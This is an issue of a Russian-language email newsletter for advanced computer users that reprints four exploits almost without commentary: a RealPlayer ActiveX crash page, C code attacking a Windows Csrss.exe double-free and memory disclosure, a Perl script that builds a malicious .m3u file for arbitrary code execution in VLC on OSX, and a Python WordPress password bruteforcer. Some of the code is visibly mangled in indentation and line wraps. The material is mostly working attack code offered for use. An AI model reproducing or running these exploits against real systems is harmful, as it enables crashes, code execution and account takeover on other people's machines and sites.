Отправляет email-рассылки с помощью сервиса Sendsay
  Все выпуски  

Компьютер для продвинутых пользоватлей Выпус по безопасности. Exploits.


Компьютер для продвинутых пользователей
В этом выпуске:
RealPlayer 10.5 | File Upload Manager 1.0.6 | VLCMediaSlayer | Wordpress
ПО: RealPlayer 10.5 Exploit:
<!--
---------------------------------------------------------------------------
RealPlayer 10.5 ierpplug.dll Internet Explorer Denial of Service
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
---------------------------------------------------------------------------
-->

lt;html>
lt;object classid='clsid:FDC7A535-4070-4B92-A0EA-D9994BCC0DC5' 
id='RealPlayer'>lt;/object>lt;script language='vbscript'>

argCount   = 2

arg1="default"
arg2=String(1000000, "A")

RealPlayer.OpenURLInPlayerBrowser arg1 ,arg2

</script>

ПО: Microsoft Windows

Expoit:
/////////////////////////////////////////
/////////////////////////////////////////
///// Microsoft Windows NtRaiseHardError
///// Csrss.exe-winsrv.dll Double Free  
/////////////////////////////////////////
///// Ruben Santamarta  
///// ruben at reversemode dot com
///// www.reversemode.com
/////////////////////////////////////////
///// 12.29.2006
///// For educational purposes ONLY
///// Compiled using gcc (Dev-C++)
////////////////////////////////////////
////// XP SP2
////////////////////////////////////////


#include <stdio.h>
#include <windows.h>
#include <winbase.h>
#include <ntsecapi.h>

#define UNICODE
#define MAGIC_VALUE 0x75b4cd40  // winsrv.dll data section


BOOL gFon=FALSE;

typedef LONG NTSTATUS;
typedef NTSTATUS (WINAPI *PNTRAISE)(NTSTATUS,
                                    ULONG,
                                    ULONG,
                                    PULONG,
                                    UINT,
                                    PULONG);    

// Csrss.exe memory monitor thread
// (Read csrss.exe memory disclosure exploit for details)

VOID WINAPI ReadBox2( LPVOID param )
{

    HWND hWindow,hButton,hText;
    DWORD hChunk,cHeader=0;
    int i=0,b=0;
    int gTemp;
    char lpTitle[300];
    char lpText[300];
    char lpBuff[500];
    ZeroMemory((LPVOID)lpTitle,250);
    ZeroMemory((LPVOID)lpText,250);
    ZeroMemory((LPVOID)lpBuff,300);
    Sleep(2000);
    
    for (;;)
    {
    
        lpText[0]=(BYTE)"";
        Sleep(1000);
        hWindow = FindWindow("#32770",NULL);
        ZeroMemory((LPVOID)lpTitle,250);
        ZeroMemory((LPVOID)lpText,250);
        ZeroMemory((LPVOID)lpBuff,300);
        
        if(hWindow != NULL)
        {
            GetWindowText(hWindow,(LPSTR)&lpTitle,250);
            
            if(strcmp(lpTitle,"Aa")!=0)
            {
                hText=FindWindowEx(hWindow,0,"static",0);
                
                GetWindowText(hText,(LPSTR)&lpText,250);
                hText=GetNextWindow(hText,GW_HWNDNEXT);
                
                GetWindowText(hText,(LPSTR)&lpText,250);
             
                cHeader=*(DWORD*)lpText;
                if( cHeader!=0)
                {
                      
                      if(cHeader >0x100000 && cHeader<0x400000)
                      {     
                            printf("\n**************************\n");
                            printf("Heap Chunk Found! Good Luck!\n");
                             printf("New Value: 0x%p",cHeader);
                           printf("\n**************************\n");
                            
                      }
                      else
                      {
                          printf("\n****************************\n");
                            printf("winsrv.dll data overwritten! \n");
                            printf("New Value: 0x%p",cHeader);
                            printf("\n****************************\n");
                           
                      }
                }  
                 else
                {
                    printf("\n****************************\n");
                    printf("nothing found! ");
                    printf("\n****************************\n");
                }  
                
                cHeader=*(DWORD*)lpTitle;
                if( cHeader!=0)
                {
                      
                      if(cHeader >0x100000 && cHeader<0x400000)
                      {     
                            printf("\n**************************\n");
                            printf("Heap Chunk Found! Good Luck!\n");
                             printf("New Value: 0x%p",cHeader);
                           printf("\n**************************\n");
                            
                      }
                      else
                      {
                          printf("\n****************************\n");
                            printf("winsrv.dll data overwritten! \n");
                            printf("New Value: 0x%p",cHeader);
                            printf("\n****************************\n");
                           
                      }
                }    
                else
                {
                    printf("\n****************************\n");
                    printf("nothing found! ");
                    printf("\n****************************\n");
                }
                
            }
            
            SendMessage(hWindow,WM_CLOSE,0,0);
               ZeroMemory((LPVOID)lpTitle,250);
            ZeroMemory((LPVOID)lpText,250);
            ZeroMemory((LPVOID)lpBuff,300);
        }
        CloseHandle(hWindow);
    }

}

VOID WINAPI ReadBox( LPVOID param )
{

    HWND hWindow;
    
    for (;;)
    {
        Sleep(1000);
        if(!gFon)
        {
                 hWindow = FindWindow("#32770",NULL);
        
                 if(hWindow != NULL )
                 {
                  SendMessage(hWindow,WM_CLOSE,0,0);
                  }
        }
    }

}


int main()
{


   UNICODE_STRING uStr={5,5,L"fun!"};
   ULONG retValue,args[]={MAGIC_VALUE,MAGIC_VALUE,(ULONG)&uStr};
   PNTRAISE NtRaiseHardError;
   DWORD dwThreadId;  

   byte  *ShellCode ="\x5C\x3F\x3F\x5C\x40\xcd\xb4\x75\x40\xcd\xb4\x75"
                     "\x40\xcd\xb4\x75\x40\xcd\xb4\x75\x40\xcd\xb4\x75"
                     "\x40\xcd\xb4\x75\x40\xcd\xb4\x75\x40\xcd\xb4\x75"
                     "\x40\xcd\xb4\x75\x40\xcd\xb4\x75\x40\xcd\xb4\x75"
                     "\x40\xcd\xb4\x75\x40\xcd\xb4\x75\x40\xcd\xb4\x75"
                     "\x40\xcd\xb4\x75\x40\xcd\xb4\x75\x40\xcd\xb4\x75"
                     "\x40\xcd\xb4\x75\x40\xcd\xb4\x75\x40\xcd\xb4\x75"
                     "\x40\xcd\xb4\x75\x40\xcd\xb4\x75\x40\xcd\xb4\x75"
                     "\x40\xcd\xb4\x75\x40\xcd\xb4\x75\x40\xcd\xb4\x75"
                     "\x40\xcd\xb4\x75\x40\xcd\xb4\x75";
                     
   int i=0;
   
   NtRaiseHardError=(PNTRAISE)GetProcAddress(GetModuleHandle("ntdll.dll"),
                                               "NtRaiseHardError");  
    system("cls");
    printf("##########################################\n");
    printf("### Microsoft Windows NtRaiseHardError ###\n");
    printf("### Csrss.exe-winsrv.dll Double-Free   ###\n");
    printf("## Ruben Santamarta www.reversemode.com ##\n");
    printf("##########################################\n");
      printf("## + Csrss.exe Double-Free     Exploit  ##\n");
      printf("## + Csrss.exe Memory Disclosure Exploit##\n");
      printf("##########################################\n");
    printf("# XP SP 2                                #\n");
      printf("##########################################\n\n");
    printf("\nThe exploit overwrites controlled addresses\n");
      printf("in winsrv.dll data section within Csrss.exe\n\n");
       
    CreateThread( NULL,              
                  0,                  
                 (LPTHREAD_START_ROUTINE)ReadBox,        
                  0,             
                  0,                 
                 &dwThreadId);
   
   // Seeding the heap               
   for(i=0;i<2;i++) 
MessageBoxA(0,"\x40\xcd\xb4\x75","\x40\xcd\xb4\x75", 
MB_SERVICE_NOTIFICATION);
    
   // Exploiting Csrss.exe Double-Free
   
   printf("[*] Stage 1 -= Hitting Heap =-\n\n")    ;         
   printf("[+] Corrupting the heap (11 attemps)\n\n");
    
   for( i=0; i<11; i++)
   {
           
           printf("#%d... ",i+1);
           MessageBoxA(0, ShellCode,"A", MB_SERVICE_NOTIFICATION);
   }
    
    gFon=TRUE;
 
    printf("\n\n[*] Stage 2 -= Scanning winsrv.dll data section =-\n\n") ;
    Sleep(2000);
    
    CreateThread( NULL,              
                  0,                  
                 (LPTHREAD_START_ROUTINE)ReadBox2,        
                  0,             
                  0,                 
                 NULL);
    
    args[0]-=0x20;     
    
    // Exploiting Csrss.exe memory disclosure flaw
    
    for(i=0;i<0xF;i++)
    {
        args[0]+=4;   
        printf("\n#%d Reading at : 
[0x%p]\n",i,args[0]);                                      
        NtRaiseHardError(0x50000018,3,4,args,1,&retValue);
    }
   
    printf("\n[+] Exploit exiting\n\n");
    
printf("#############################################################\n");
    printf("If you didn't find anything, run the exploit one more time!\n");
    printf("If you find a heap chunk address, enjoy!\n");
    
printf("#############################################################\n");
 
 
}
<hr size="3" color="#0099CC">

ПО: VLCMediaSlayer
Exploit:
#!/usr/bin/perl
#
# http://www.digitalmunition.com/VLCMediaSlayer-ppc.pl
# Code by Kevin Finisterre kf_lists[at]digitalmunition[dot]com
#
# This is just a vanilla format string exploit for OSX on ppc. We 
overwrite a saved return addy with our shellcode address.
# This code currently overwrites the saved return addy with the stack 
location of our shellcode.
#
# This exploit will create a malicious .m3u file that will cause VLC 
Player for OSX to execute arbitrary code.
#

# 0xf02031d2:      "--? 0j? 0h%11$hn.%12$hn", 'X' <repeats 177 times>...
# 0xf020329a:      'X' <repeats 200 times>...
# 0xf0203362:      'X' <repeats 200 times>...
# 0xf020342a:      'X' <repeats 200 times>...
# 0xf02034f2:      'X' <repeats 194 times>, "ZY"
# 0xf02035b7:      ""
# 0xf02035b8:      'X' <repeats 16 times>, "? 5?\05\17G?? 60"
# 0xf02035d5:      ""
# 0xf02035d6:      ""
# 0xf02035d7:      "\04\05\16

$format =
# make it more robust yourself... I'm lazy
# land in 0xf020 3362 - middle of shellcode
# "%2511%24hn.%2512%24hn" .
#
"%25" . (0x3362-0x24) . "d" . "%25" . "11" . "%24" . "hn" .
"%25" . 0xBCBE . "d" . "%25" . "12" . "%24" . "hn" ;

# 0xf020 3068 saved ret for MsgQueue()
$writeaddr = 0xf0203068;

open(PWNED,">pwnage.m3u");

print PWNED "#EXTM3U\n" ."udp://--" . pack('l', $writeaddr+2) . 
pack('l', $writeaddr) .
$format ."i" x (999 - length("Can't get file status for ") ) ."\n";

close(PWNED);

ПО: Wordpress

Exploit:
#!usr/bin/python
# Flaw found on Wordpress
# that allow Dictionnary & Bruteforce attack
# Greetz goes to : NeoMorphS, Tiky
# Vendor : http://wordpress.org/
# Found by : Kad (kadfrox@gmail.com / #kadaj-diabolik@hotmail.fr)
import urllib , urllib2, sys, string
tab = "%s%s%s"%( string.ascii_letters, string.punctuation, string.digits )
tab = [  i for i in tab ]
def node( table, parent, size ):
    if size == 0:
        pass
    else:
        for c in table:
            string = "%s%s"%( parent, c )
                        data = {'log': sys.argv[2],
                                'pwd': string}
                        print "[+] Testing : "+string
                        request = urllib2.Request(server, 
urllib.urlencode(data))
                        f = urllib2.urlopen(request).read()
                        if not "Incorrect password.</div>" in f: 
print "[!] Password is : "+mot ; break
            node( table, string, size-1 )
 
def bruteforce( table, size ):
    for c in table:
        node( table, c, size-1 )
        
if (len(sys.argv) < 3):
    print "Usage : float.py <server> <user> <choice> 
<dico-characters>"
    print "\nDefault: User is 'admin'"
    print "Choice : 1} Dictionnary Attack, use dictionnary file"
    print "         2} Bruteforce Attack, use number of character for 
password"
    
else:
    server = sys.argv[1]
    if sys.argv[3] == "1":
    a , b = open(sys.argv[4],'r') , 0
    for lines in a: b = b + 1
    a.seek(0)    
    c = 0
    while (c < b):
        mot = a.readline().rstrip()
        data = {'log': sys.argv[2],
                'pwd': mot}
        print "[+] Testing : "+mot
        request = urllib2.Request(server, urllib.urlencode(data))
        f = urllib2.urlopen(request).read()
        if not "Incorrect password.</div>" in f: print "[!] Password 
is : "+mot ; break
        else: c = c + 1 ; pass
    if sys.argv[3] == "2":
    print "[-] Server is : "+server
    print "[-] User is : "+sys.argv[2]
    print "[-] Number of characters are : "+sys.argv[4]
        number = int(sys.argv[4])
        bruteforce( tab, number )
Не забудьте проголосовать за выпуск!
Рассылка создана и ведется при поддержке Информационной сети Пермского края.
Меня можно найти: ICQ - 273214003

e-mail - isdmi1::mail.ru

В избранное